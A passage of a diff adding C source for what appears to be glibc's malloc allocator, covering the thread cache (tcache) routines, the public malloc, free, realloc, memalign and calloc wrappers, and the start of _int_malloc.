+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (size + offset == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) p - offset, size + offset, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert (prev_size (p) == offset);
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+#if USE_TCACHE
+
+/* We overlay this structure on the user-data portion of a chunk when
+   the chunk is stored in the per-thread cache.  */
+typedef struct tcache_entry
+{
+  struct tcache_entry *next;
+} tcache_entry;
+
+/* There is one of these for each thread, which contains the
+   per-thread cache (hence "tcache_perthread_struct").  Keeping
+   overall size low is mildly important.  Note that COUNTS and ENTRIES
+   are redundant (we could have just counted the linked list each
+   time), this is for performance reasons.  */
+typedef struct tcache_perthread_struct
+{
+  char counts[TCACHE_MAX_BINS];
+  tcache_entry *entries[TCACHE_MAX_BINS];
+} tcache_perthread_struct;
+
+static __thread bool tcache_shutting_down = false;
+static __thread tcache_perthread_struct *tcache = NULL;
+
+/* Caller must ensure that we know tc_idx is valid and there's room
+   for more chunks.  */
+static __always_inline void
+tcache_put (mchunkptr chunk, size_t tc_idx)
+{
+  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
+  assert (tc_idx < TCACHE_MAX_BINS);
+  e->next = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e;
+  ++(tcache->counts[tc_idx]);
+}
+
+/* Caller must ensure that we know tc_idx is valid and there's
+   available chunks to remove.  */
+static __always_inline void *
+tcache_get (size_t tc_idx)
+{
+  tcache_entry *e = tcache->entries[tc_idx];
+  assert (tc_idx < TCACHE_MAX_BINS);
+  assert (tcache->entries[tc_idx] > 0);
+  tcache->entries[tc_idx] = e->next;
+  --(tcache->counts[tc_idx]);
+  return (void *) e;
+}
+
+static void
+tcache_thread_shutdown (void)
+{
+  int i;
+  tcache_perthread_struct *tcache_tmp = tcache;
+
+  if (!tcache)
+    return;
+
+  /* Disable the tcache and prevent it from being reinitialized.  */
+  tcache = NULL;
+  tcache_shutting_down = true;
+
+  /* Free all of the entries and the tcache itself back to the arena
+     heap for coalescing.  */
+  for (i = 0; i < TCACHE_MAX_BINS; ++i)
+    {
+      while (tcache_tmp->entries[i])
+	{
+	  tcache_entry *e = tcache_tmp->entries[i];
+	  tcache_tmp->entries[i] = e->next;
+	  __libc_free (e);
+	}
+    }
+
+  __libc_free (tcache_tmp);
+}
+
+static void
+tcache_init(void)
+{
+  mstate ar_ptr;
+  void *victim = 0;
+  const size_t bytes = sizeof (tcache_perthread_struct);
+
+  if (tcache_shutting_down)
+    return;
+
+  arena_get (ar_ptr, bytes);
+  victim = _int_malloc (ar_ptr, bytes);
+  if (!victim && ar_ptr != NULL)
+    {
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  /* In a low memory situation, we may not be able to allocate memory
+     - in which case, we just keep trying later.  However, we
+     typically do this very early, so either there is sufficient
+     memory, or there isn't enough memory to do non-trivial
+     allocations anyway.  */
+  if (victim)
+    {
+      tcache = (tcache_perthread_struct *) victim;
+      memset (tcache, 0, sizeof (tcache_perthread_struct));
+    }
+
+}
+
+# define MAYBE_INIT_TCACHE() \
+  if (__glibc_unlikely (tcache == NULL)) \
+    tcache_init();
+
+#else  /* !USE_TCACHE */
+# define MAYBE_INIT_TCACHE()
+
+static void
+tcache_thread_shutdown (void)
+{
+  /* Nothing to do if there is no thread cache.  */
+}
+
+#endif /* !USE_TCACHE  */
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+#if USE_TCACHE
+  /* int_free also calls request2size, be careful to not pad twice.  */
+  size_t tbytes;
+  checked_request2size (bytes, tbytes);
+  size_t tc_idx = csize2tidx (tbytes);
+
+  MAYBE_INIT_TCACHE ();
+
+  DIAG_PUSH_NEEDS_COMMENT;
+  if (tc_idx < mp_.tcache_bins
+      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
+      && tcache
+      && tcache->entries[tc_idx] != NULL)
+    {
+      return tcache_get (tc_idx);
+    }
+  DIAG_POP_NEEDS_COMMENT;
+#endif
+
+  if (SINGLE_THREAD_P)
+    {
+      victim = _int_malloc (&main_arena, bytes);
+      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (victim)));
+      return victim;
+    }
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* See if the dynamic brk/mmap threshold needs adjusting.
+	 Dumped fake mmapped chunks do not affect the threshold.  */
+      if (!mp_.no_dyn_threshold
+          && chunksize_nomask (p) > mp_.mmap_threshold
+          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX
+	  && !DUMPED_MAIN_ARENA_CHUNK (p))
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    {
+      MAYBE_INIT_TCACHE ();
+      ar_ptr = arena_for_chunk (oldp);
+    }
+
+  /* Little security check which won't hurt performance: the allocator
+     never wrapps around at the end of the address space.  Therefore
+     we can exclude some size values which might appear here by
+     accident or by "design" from some intruder.  We need to bypass
+     this check for dumped fake mmap chunks from the old main arena
+     because the new malloc may provide additional alignment.  */
+  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+       || __builtin_expect (misaligned_chunk (oldp), 0))
+      && !DUMPED_MAIN_ARENA_CHUNK (oldp))
+      malloc_printerr ("realloc(): invalid pointer");
+
+  checked_request2size (bytes, nb);
+
+  if (chunk_is_mmapped (oldp))
+    {
+      /* If this is a faked mmapped chunk from the dumped main arena,
+	 always make a copy (and do not free the old chunk).  */
+      if (DUMPED_MAIN_ARENA_CHUNK (oldp))
+	{
+	  /* Must alloc, copy, free. */
+	  void *newmem = __libc_malloc (bytes);
+	  if (newmem == 0)
+	    return NULL;
+	  /* Copy as many bytes as are available from the old chunk
+	     and fit into the new size.  NB: The overhead for faked
+	     mmapped chunks is only SIZE_SZ, not 2 * SIZE_SZ as for
+	     regular mmapped chunks.  */
+	  if (bytes > oldsize - SIZE_SZ)
+	    bytes = oldsize - SIZE_SZ;
+	  memcpy (newmem, oldmem, bytes);
+	  return newmem;
+	}
+
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+      assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+	      ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+      return newp;
+    }
+
+  __libc_lock_lock (ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  __libc_lock_unlock (ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      p = _int_memalign (&main_arena, alignment, bytes);
+      assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (p)));
+
+      return p;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes = ALIGN_UP (bytes, pagesize);
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - 2 * pagesize - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T bytes, sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+
+  /* size_t is unsigned so the behavior on overflow is defined.  */
+  bytes = n * elem_size;
+#define HALF_INTERNAL_SIZE_T \
+  (((INTERNAL_SIZE_T) 1) << (8 * sizeof (INTERNAL_SIZE_T) / 2))
+  if (__builtin_expect ((n | elem_size) >= HALF_INTERNAL_SIZE_T, 0))
+    {
+      if (elem_size != 0 && bytes / elem_size != n)
+        {
+          __set_errno (ENOMEM);
+          return 0;
+        }
+    }
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      sz = bytes;
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  sz = bytes;
+
+  MAYBE_INIT_TCACHE ();
+
+  if (SINGLE_THREAD_P)
+    av = &main_arena;
+  else
+    arena_get (av, sz);
+
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (!SINGLE_THREAD_P)
+    {
+      if (mem == 0 && av != NULL)
+	{
+	  LIBC_PROBE (memory_calloc_retry, 1, sz);
+	  av = arena_get_retry (av, sz);
+	  mem = _int_malloc (av, sz);
+	}
+
+      if (av != NULL)
+	__libc_lock_unlock (av->mutex);
+    }
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+#if USE_TCACHE
+  size_t tcache_unsorted_count;	    /* count of unsorted chunks processed */
+#endif
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size traps (returning 0) request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  checked_request2size (bytes, nb);
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+#define REMOVE_FB(fb, victim, pp)			\
+  do							\
+    {							\
+      victim = pp;					\
+      if (victim == NULL)				\
+	break;						\
+    }							\
+  while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim)) \
+	 != victim);					\
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp;
+      victim = *fb;
+
+      if (victim != NULL)
+	{
+	  if (SINGLE_THREAD_P)
+	    *fb = victim->fd;
+	  else
+	    REMOVE_FB (fb, pp, victim);
+	  if (__glibc_likely (victim != NULL))
+	    {
+	      size_t victim_idx = fastbin_index (chunksize (victim));
+	      if (__builtin_expect (victim_idx != idx, 0))
+		malloc_printerr ("malloc(): memory corruption (fast)");
+	      check_remalloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	      /* While we're here, if we see other chunks of the same size,
+		 stash them in the tcache.  */
+	      size_t tc_idx = csize2tidx (nb);
+	      if (tcache && tc_idx < mp_.tcache_bins)
+		{
+		  mchunkptr tc_victim;
+
+		  /* While bin not empty and tcache not full, copy chunks.  */
+		  while (tcache->counts[tc_idx] < mp_.tcache_count
+			 && (tc_victim = *fb) != NULL)
+		    {
+		      if (SINGLE_THREAD_P)
+			*fb = tc_victim->fd;
+		      else
+			{
+			  REMOVE_FB (fb, pp, tc_victim);
+			  if (__glibc_unlikely (tc_victim == NULL))
+			    break;
+			}
+		      tcache_put (tc_victim, tc_idx);
+		    }
+		}
+#endif
+	      void *p = chunk2mem (victim);
+	      alloc_perturb (p, bytes);
+	      return p;
+	    }
+	}
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          bck = victim->bk;
+	  if (__glibc_unlikely (bck->fd != victim))
+	    malloc_printerr ("malloc(): smallbin double linked list corrupted");
+          set_inuse_bit_at_offset (victim, nb);
+          bin->bk = bck;
+          bck->fd = bin;
+
+          if (av != &main_arena)
+	    set_non_main_arena (victim);
+          check_malloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	  /* While we're here, if we see other chunks of the same size,
+	     stash them in the tcache.  */
+	  size_t tc_idx = csize2tidx (nb);
+	  if (tcache && tc_idx < mp_.tcache_bins)
+	    {
+	      mchunkptr tc_victim;
+
+	      /* While bin not empty and tcache not full, copy chunks over.  */
+	      while (tcache->counts[tc_idx] < mp_.tcache_count
+		     && (tc_victim = last (bin)) != bin)
+		{
+		  if (tc_victim != 0)
+		    {
+		      bck = tc_victim->bk;
+		      set_inuse_bit_at_offset (tc_victim, nb);
+		      if (av != &main_arena)
+			set_non_main_arena (tc_victim);
+		      bin->bk = bck;
+		      bck->fd = bin;
+
+		      tcache_put (tc_victim, tc_idx);
+	            }
+		}
+	    }
+#endif
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs that
+     it is called frequently in otherwise tend to fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (atomic_load_relaxed (&av->have_fastchunks))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is exact fit, or, if this a small request, the chunk is remainder from
+     the most recent non-exact fit.  Place other traversed chunks in
+     bins.  Note that this step is the only place in any routine where
+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+#if USE_TCACHE
+  INTERNAL_SIZE_T tcache_nb = 0;
+  size_t tc_idx = csize2tidx (nb);
+  if (tcache && tc_idx < mp_.tcache_bins)
+    tcache_nb = nb;
+  int return_cached = 0;
+
+  tcache_unsorted_count = 0;
+#endif
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          if (__builtin_expect (chunksize_nomask (victim) <= 2 * SIZE_SZ, 0)
+              || __builtin_expect (chunksize_nomask (victim)
+				   > av->system_mem, 0))
+            malloc_printerr ("malloc(): memory corruption");
+          size = chunksize (victim);
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+#if USE_TCACHE
+	      /* Fill cache first, return to user only if cache fills.
+		 We may return one of these chunks later.  */
+	      if (tcache_nb
+		  && tcache->counts[tc_idx] < mp_.tcache_count)
+		{
+		  tcache_put (victim, tc_idx);
+		  return_cached = 1;
+		  continue;
+		}
+	      else
+		{
+#endif
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+#if USE_TCACHE
+		}
+#endif
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert (chunk_main_arena (bck->bk));
+                  if ((unsigned long) (size)
+		      < (unsigned long) chunksize_nomask (bck->bk))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert (chunk_main_arena (fwd));
+                      while ((unsigned long) size < chunksize_nomask (fwd))
+                        {
+                          fwd = fwd->fd_nextsize;
+			  assert (chunk_main_arena (fwd));
+                        }
+
+                      if ((unsigned long) size
+			  == (unsigned long) chunksize_nomask (fwd))
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#if USE_TCACHE
+      /* If we've processed as many chunks as we're allowed while
+	 filling the cache, return one of the cached ones.  */
+      ++tcache_unsorted_count;
+      if (return_cached
+	  && mp_.tcache_unsorted_limit > 0
+	  && tcache_unsorted_count > mp_.tcache_unsorted_limit)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+#if USE_TCACHE
+      /* If all the small chunks we found ended up cached, return one now.  */
+      if (return_cached)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin
+	      && (unsigned long) chunksize_nomask (victim)
+	        >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin)
+		  && chunksize_nomask (victim)
+		    == chunksize_nomask (victim->fd))
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
